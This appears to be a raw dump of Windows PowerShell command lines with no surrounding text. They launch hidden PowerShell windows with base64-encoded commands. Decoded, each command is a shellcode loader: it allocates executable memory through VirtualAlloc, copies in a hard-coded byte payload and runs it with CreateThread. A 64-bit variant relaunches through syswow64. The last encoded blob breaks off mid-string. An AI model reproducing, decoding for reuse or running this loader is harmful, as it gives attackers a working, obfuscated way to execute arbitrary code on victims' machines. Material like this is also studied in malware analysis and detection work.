AHgAYgA4ACwAMAB4ADEANwAsADAAeAAyADQALAAwAHgANABjACwAMAB4ADkAMAAsADAAeABkADMALAAwAHgANwAwACwAMAB4ADEAYwAsADAAeAA4AGEALAAwAHgAZgAyACwAMAB4AGYAOAAsADAAeABmADcALAAwAHgANABhACwAMAB4AGYAYgAsADAAeAAyAGMALAAwAHgANgBkACwAMAB4ADQAMQAsADAAeAA2AGIALAAwAHgAMABmACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgAZQBhACwAMAB4AGUANwAsADAAeAAxADkALAAwAHgAMABhACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAOQA0ACwAMAB4AGUAYwAsADAAeABhADAALAAwAHgAMQBlACwAMAB4AGYANwAsADAAeABhADAALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeABiADcALAAwAHgAMQAwACwAMAB4AGUAOAAsADAAeAAwADUALAAwAHgAMwA4ACwAMAB4ADQAZQAsADAAeAAwADgALAAwAHgAMgA2ACwAMAB4ADkAMgAsADAAeABlADcALAAwAHgAYQAyACwAMAB4AGMAOQAsADAAeAA0AGIALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA3ADMALAAwAHgAZAA2ACwAMAB4ADIAYgAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAMwBiACwAMAB4AGYANgAsADAAeABlADMALAAwAHgAYQA2ACwAMAB4AGYANQAsADAAeABmAGYALAAwAHgAOABlACwAMAB4AGIANAAsADAAeAA2ADEALAAwAHgAZgAwACwAMAB4AGMANAAsADAAeABlADcALAAwAHgAMgA3ACwAMAB4ADAAZgAsADAAeABmADMALAAwAHgAOAAyACwAMAB4AGMANwAsADAAeAA4ADUALAAwAHgAZgA4ACwAMAB4ADAANAAsADAAeAA5ADAALAAwAHgAMwAxACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAZAA2ACwAMAB4ADkAZAAsADAAeABmAGMALAAwAHgANQA3ACwAMAB4ADYAZAAsADAAeAAxADcALAAwAHgANgA5ACwAMAB4ADEAOAAsADAAeAAxADkALAAwAHgANQA4ACwAMAB4ADcAZAAsADAAeAA5ADgALAAwAHgAZAA5ACwAMAB4ADAAZQAsADAAeAAxADcALAAwAHgAOQA4ACwAMAB4AGIAMQAsADAAeABmADYALAAwAHgANAAzACwAMAB4AGMAYgAsADAAeABhADQALAAwAHgAZgA4ACwAMAB4ADUAOQAsADAAeAA3AGYALAAwAHgANwA1ACwAMAB4ADYAZAAsADAAeAA2ADIALAAwAHgAZAA2ACwAMAB4ADIAYQAsADAAeAAyADYALAAwAHgAMABhACwAMAB4AGQANAAsADAAeAAxADUALAAwAHgAMAAwACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANwAwACwAMAB4ADkAMAAsADAAeABlADkALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABlADYALAAwAHgAMAAzACwAMAB4AGMAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZABPAEgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGQATwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABkAE8ASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEAMgBWACkAKQA7ACQASQA5AE0AOQAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdABjAFUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB0AGMAVQAgACQASQA5AE0AOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABJADkATQA5ACAAJABlACIAOwB9AA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABBADIAVgAgAD0AIAAnACQAUAB5AHgAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AHgAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADEAOQAsADAAeABhAGIALAAwAHgAYQA4ACwAMAB4AGEAYwAsADAAeABkADkALAAwAHgAZQBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADgAMwAsADAAeABmADMALAAwAHgANQA3ACwAMAB4ADQAYQAsADAAeAA1ADkALAAwAHgAZgBmACwAMAB4ADQAMAAsADAAeAAwADQALAAwAHgAYQAyACwAMAB4AGYAZgAsADAAeAA5ADAALAAwAHgANwBiACwAMAB4ADkAMgAsADAAeAAyAGQALAAwAHgAZgA0ACwAMAB4AGYAMAAsADAAeAA4ADYALAAwAHgAZQAxACwAMAB4ADcAYwAsADAAeABlADMALAAwAHgAYQBjACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgANgA3ACwAMAB4AGUAMAAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAANQAsADAAeAAyAGQALAAwAHgANQA2ACwAMAB4AGUAOQAsADAAeABlADUALAAwAHgAOQBhACwAMAB4AGQAMgAsADAAeAAzADMALAAwAHgAYwBiACwAMAB4ADIANAAsADAAeAA0AGUALAAwAHgAMAA3ACwAMAB4ADQAYQAsADAAeABkADkALAAwAHgAOABjACwAMAB4ADUANAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeABhADkALAAwAHgAYQBkACwAMAB4ADIANQAsADAAeAAxADYALAAwAHgAYwA3ACwAMAB4ADQAMgAsADAAeABmAGIALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjAGYALAAwAHgAZQBjACwAMAB4ADcANAAsADAAeABmADAALAAwAHgAZAAzACwAMAB4ADAAZAAsADAAeAA1AGEALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4ADQAMQAsADAAeAAxADgALAAwAHgAYwBhACwAMAB4AGQAZQAsADAAeAA5ADEALAAwAHgAYgAxACwAMAB4ADUAOQAsADAAeABhADgALAAwAHgAMAA5ACwAMAB4AGIAOQAsADAAeAAwADYALAAwAHgAMAA4ACwAMAB4ADIAYgAsADAAeAA2AGUALAAwAHgAMwAzACwAMAB4ADgAMQAsADAAeAA1AGYALAAwAHgAYQBjACwAMAB4ADAAZAAsADAAeABlAGUALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeAA1ADkALAAwAHgAOQBiACwAMAB4AGUAYgAsADAAeAA4ADEALAAwAHgAOQAzACwAMAB4ADUAYgAsADAAeAAyAGEALAAwAHgAZQAyACwAMAB4AGQAOQAsADAAeABmADcALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQA3ACwAMAB4AGQAYQAsADAAeAAzADAALAAwAHgAMQA5ACwAMAB4ADkAYQAsADAAeABkAGMALAAwAHgAOAAyACwAMAB4ADYAMwAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADEANQAsADAAeABjADMALAAwAHgAMAAzACwAMAB4AGMAYQAsADAAeABmADEALAAwAHgAZgA1ACwAMAB4AGMAMAAsADAAeAA4AGQALAAwAHgANwAyACwAMAB4AGYAOQAsADAAeABhAGQALAAwAHgAZABhACwAMAB4AGQAZAAsADAAeAAxAGUALAAwAHgAMwAwACwAMAB4ADAAZQAsADAAeAA1ADYALAAwAHgAMQBhACwAMAB4AGIAOQAsADAAeABiADEALAAwAHgAYgA5ACwAMAB4AGEAYQAsADAAeABmADkALAAwAHgAOQA1ACwAMAB4ADEAZAAsADAAeABmADYALAAwAHgANQBhACwAMAB4AGIANwAsADAAeAAwADQALAAwAHgANQAyACwAMAB4ADAAZAAsADAAeABjADgALAAwAHgANQA3ACwAMAB4ADMAYQAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEAMwAsADAAeABhADkALAAwAHgAZQA1ACwAMAB4ADEAMQAsADAAeABkAGMALAAwAHgAMwAxACwAMAB4ADAAYQAsADAAeAA0AGMALAAwAHgANABiACwAMAB4AGYAZAAsADAAeABjADYALAAwAHgANgBmACwAMAB4ADgAYgAsADAAeAA2ADkALAAwAHgANQAxACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAMwA2ACwAMAB4AGMAOQAsADAAeAA4AGIALAAwAHgAZgAxACwAMAB4AGIAZgAsADAAeABkADcALAAwAHgANABjACwAMAB4ADgAMwAsADAAeABhADgALAAwAHgAZQA4ACwAMAB4ADgAMwAsADAAeAAyAGIALAAwAHgAYgA4ACwAMAB4ADEANwAsADAAeAAyADQALAAwAHgANABjACwAMAB4ADkAMAAsADAAeABkADMALAAwAHgANwAwACwAMAB4ADEAYwAsADAAeAA4AGEALAAwAHgAZgAyACwAMAB4AGYAOAAsADAAeABmADcALAAwAHgANABhACwAMAB4AGYAYgAsADAAeAAyAGMALAAwAHgANgBkACwAMAB4ADQAMQAsADAAeAA2AGIALAAwAHgAMABmACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgAZQBhACwAMAB4AGUANwAsADAAeAAxADkALAAwAHgAMABhACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAOQA0ACwAMAB4AGUAYwAsADAAeABhADAALAAwAHgAMQBlACwAMAB4AGYANwAsADAAeABhADAALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeABiADcALAAwAHgAMQAwACwAMAB4AGUAOAAsADAAeAAwADUALAAwAHgAMwA4ACwAMAB4ADQAZQAsADAAeAAwADgALAAwAHgAMgA2ACwAMAB4ADkAMgAsADAAeABlADcALAAwAHgAYQAyACwAMAB4AGMAOQAsADAAeAA0AGIALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA3ADMALAAwAHgAZAA2ACwAMAB4ADIAYgAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAMwBiACwAMAB4AGYANgAsADAAeABlADMALAAwAHgAYQA2ACwAMAB4AGYANQAsADAAeABmAGYALAAwAHgAOABlACwAMAB4AGIANAAsADAAeAA2ADEALAAwAHgAZgAwACwAMAB4AGMANAAsADAAeABlADcALAAwAHgAMgA3ACwAMAB4ADAAZgAsADAAeABmADMALAAwAHgAOAAyACwAMAB4AGMANwAsADAAeAA4ADUALAAwAHgAZgA4ACwAMAB4ADAANAAsADAAeAA5ADAALAAwAHgAMwAxACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAZAA2ACwAMAB4ADkAZAAsADAAeABmAGMALAAwAHgANQA3ACwAMAB4ADYAZAAsADAAeAAxADcALAAwAHgANgA5ACwAMAB4ADEAOAAsADAAeAAxADkALAAwAHgANQA4ACwAMAB4ADcAZAAsADAAeAA5ADgALAAwAHgAZAA5ACwAMAB4ADAAZQAsADAAeAAxADcALAAwAHgAOQA4ACwAMAB4AGIAMQAsADAAeABmADYALAAwAHgANAAzACwAMAB4AGMAYgAsADAAeABhADQALAAwAHgAZgA4ACwAMAB4ADUAOQAsADAAeAA3AGYALAAwAHgANwA1ACwAMAB4ADYAZAAsADAAeAA2ADIALAAwAHgAZAA2ACwAMAB4ADIAYQAsADAAeAAyADYALAAwAHgAMABhACwAMAB4AGQANAAsADAAeAAxADUALAAwAHgAMAAwACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANwAwACwAMAB4ADkAMAAsADAAeABlADkALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABlADYALAAwAHgAMAAzACwAMAB4AGMAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZABPAEgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGQATwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABkAE8ASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEAMgBWACkAKQA7ACQASQA5AE0AOQAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdABjAFUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB0AGMAVQAgACQASQA5AE0AOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABJADkATQA5ACAAJABlACIAOwB9AA==

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABQAHkAeAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFAAeQB4ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADkALAAwAHgAYQBiACwAMAB4AGEAOAAsADAAeABhAGMALAAwAHgAZAA5ACwAMAB4AGUAZQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBhACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANwAyACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANwAyACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAZgAzACwAMAB4ADUANwAsADAAeAA0AGEALAAwAHgANQA5ACwAMAB4AGYAZgAsADAAeAA0ADAALAAwAHgAMAA0ACwAMAB4AGEAMgAsADAAeABmAGYALAAwAHgAOQAwACwAMAB4ADcAYgAsADAAeAA5ADIALAAwAHgAMgBkACwAMAB4AGYANAAsADAAeABmADAALAAwAHgAOAA2ACwAMAB4AGUAMQAsADAAeAA3AGMALAAwAHgAZQAzACwAMAB4AGEAYwAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4ADYANwAsADAAeABlADAALAAwAHgANAA3ACwAMAB4ADAAMAAsADAAeAAwADUALAAwAHgAMgBkACwAMAB4ADUANgAsADAAeABlADkALAAwAHgAZQA1ACwAMAB4ADkAYQAsADAAeABkADIALAAwAHgAMwAzACwAMAB4AGMAYgAsADAAeAAyADQALAAwAHgANABlACwAMAB4ADAANwAsADAAeAA0AGEALAAwAHgAZAA5ACwAMAB4ADgAYwAsADAAeAA1ADQALAAwAHgAYQBjACwAMAB4AGUAMAAsADAAeAA1AGYALAAwAHgAYQA5ACwAMAB4AGEAZAAsADAAeAAyADUALAAwAHgAMQA2ACwAMAB4AGMANwAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAYwBmACwAMAB4AGUAYwAsADAAeAA3ADQALAAwAHgAZgAwACwAMAB4AGQAMwAsADAAeAAwAGQALAAwAHgANQBhACwAMAB4ADcAZQAsADAAeAA2AGIALAAwAHgANwA2ACwAMAB4AGQAZgAsADAAeAA0ADEALAAwAHgAMQA4ACwAMAB4AGMAYQAsADAAeABkAGUALAAwAHgAOQAxACwAMAB4AGIAMQAsADAAeAA1ADkALAAwAHgAYQA4ACwAMAB4ADAAOQAsADAAeABiADkALAAwAHgAMAA2ACwAMAB4ADAAOAAsADAAeAAyAGIALAAwAHgANgBlACwAMAB4ADMAMwAsADAAeAA4ADEALAAwAHgANQBmACwAMAB4AGEAYwAsADAAeAAwAGQALAAwAHgAZQBlACwAMAB4AGUAOQAsADAAeAA0ADcALAAwAHgANQA5ACwAMAB4ADkAYgAsADAAeABlAGIALAAwAHgAOAAxACwAMAB4ADkAMwAsADAAeAA1AGIALAAwAHgAMgBhACwAMAB4AGUAMgAsADAAeABkADkALAAwAHgAZgA3ACwAMAB4AGEAYwAsADAAeAAzAGEALAAwAHgAZAA5ACwAMAB4AGUANwAsADAAeABkAGEALAAwAHgAMwAwACwAMAB4ADEAOQAsADAAeAA5AGEALAAwAHgAZABjACwAMAB4ADgAMgAsADAAeAA2ADMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAxADUALAAwAHgAYwAzACwAMAB4ADAAMwAsADAAeABjAGEALAAwAHgAZgAxACwAMAB4AGYANQAsADAAeABjADAALAAwAHgAOABkACwAMAB4ADcAMgAsADAAeABmADkALAAwAHgAYQBkACwAMAB4AGQAYQAsADAAeABkAGQALAAwAHgAMQBlACwAMAB4ADMAMAAsADAAeAAwAGUALAAwAHgANQA2ACwAMAB4ADEAYQAsADAAeABiADkALAAwAHgAYgAxACwAMAB4AGIAOQAsADAAeABhAGEALAAwAHgAZgA5ACwAMAB4ADkANQAsADAAeAAxAGQALAAwAHgAZgA2ACwAMAB4ADUAYQAsADAAeABiADcALAAwAHgAMAA0ACwAMAB4ADUAMgAsADAAeAAwAGQALAAwAHgAYwA4ACwAMAB4ADUANwAsADAAeAAzAGEALAAwAHgAZgAyACwAMAB4ADYAYwAsADAAeAAxADMALAAwAHgAYQA5ACwAMAB4AGUANQAsADAAeAAxADEALAAwAHgAZABjACwAMAB4ADMAMQAsADAAeAAwAGEALAAwAHgANABjACwAMAB4ADQAYgAsADAAeABmAGQALAAwAHgAYwA2ACwAMAB4ADYAZgAsADAAeAA4AGIALAAwAHgANgA5ACwAMAB4ADUAMQAsADAAeAAwADMALAAwAHgAYgA5ACwAMAB4ADMANgAsADAAeABjADkALAAwAHgAOABiACwAMAB4AGYAMQAsADAAeABiAGYALAAwAHgAZAA3ACwAMAB4ADQAYwAsADAAeAA4ADMALAAwAHgAYQA4ACwAMAB4AGUAOAAsADAAeAA4ADMALAAwAHgAMgBiACwAMAB4AGIAOAAsADAAeAAxADcALAAwAHgAMgA0ACwAMAB4ADQAYwAsADAAeAA5ADAALAAwAHgAZAAzACwAMAB4ADcAMAAsADAAeAAxAGMALAAwAHgAOABhACwAMAB4AGYAMgAsADAAeABmADgALAAwAHgAZgA3ACwAMAB4ADQAYQAsADAAeABmAGIALAAwAHgAMgBjACwAMAB4ADYAZAAsADAAeAA0ADEALAAwAHgANgBiACwAMAB4ADAAZgAsADAAeABkAGEALAAwAHgAZQAxACwAMAB4AGUAYQAsADAAeABlADcALAAwAHgAMQA5ACwAMAB4ADAAYQAsADAAeABlADgALAAwAHgAYQAwACwAMAB4ADkANAAsADAAeABlAGMALAAwAHgAYQAwACwAMAB4ADEAZQAsADAAeABmADcALAAwAHgAYQAwACwAMAB4ADAAMAAsADAAeABjAGYALAAwAHgAYgA3ACwAMAB4ADEAMAAsADAAeABlADgALAAwAHgAMAA1ACwAMAB4ADMAOAAsADAAeAA0AGUALAAwAHgAMAA4ACwAMAB4ADIANgAsADAAeAA5ADIALAAwAHgAZQA3ACwAMAB4AGEAMgAsADAAeABjADkALAAwAHgANABiACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgANwAzACwAMAB4AGQANgAsADAAeAAyAGIALAAwAHgAZgBiACwAMAB4ADcAYwAsADAAeABjAGMALAAwAHgANQAxACwAMAB4ADMAYgAsADAAeABmADYALAAwAHgAZQAzACwAMAB4AGEANgAsADAAeABmADUALAAwAHgAZgBmACwAMAB4ADgAZQAsADAAeABiADQALAAwAHgANgAxACwAMAB4AGYAMAAsADAAeABjADQALAAwAHgAZQA3ACwAMAB4ADIANwAsADAAeAAwAGYALAAwAHgAZgAzACwAMAB4ADgAMgAsADAAeABjADcALAAwAHgAOAA1ACwAMAB4AGYAOAAsADAAeAAwADQALAAwAHgAOQAwACwAMAB4ADMAMQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4AGQANgAsADAAeAA5AGQALAAwAHgAZgBjACwAMAB4ADUANwAsADAAeAA2AGQALAAwAHgAMQA3ACwAMAB4ADYAOQAsADAAeAAxADgALAAwAHgAMQA5ACwAMAB4ADUAOAAsADAAeAA3AGQALAAwAHgAOQA4ACwAMAB4AGQAOQAsADAAeAAwAGUALAAwAHgAMQA3ACwAMAB4ADkAOAAsADAAeABiADEALAAwAHgAZgA2ACwAMAB4ADQAMwAsADAAeABjAGIALAAwAHgAYQA0ACwAMAB4AGYAOAAsADAAeAA1ADkALAAwAHgANwBmACwAMAB4ADcANQAsADAAeAA2AGQALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAAyAGEALAAwAHgAMgA2ACwAMAB4ADAAYQAsADAAeABkADQALAAwAHgAMQA1ACwAMAB4ADAAMAAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADcAMAAsADAAeAA5ADAALAAwAHgAZQA5ACwAMAB4AGYAMQAsADAAeABiAGMALAAwAHgAZQA2ACwAMAB4ADAAMwAsADAAeABjADIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGQATwBIAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABkAE8ASAAuA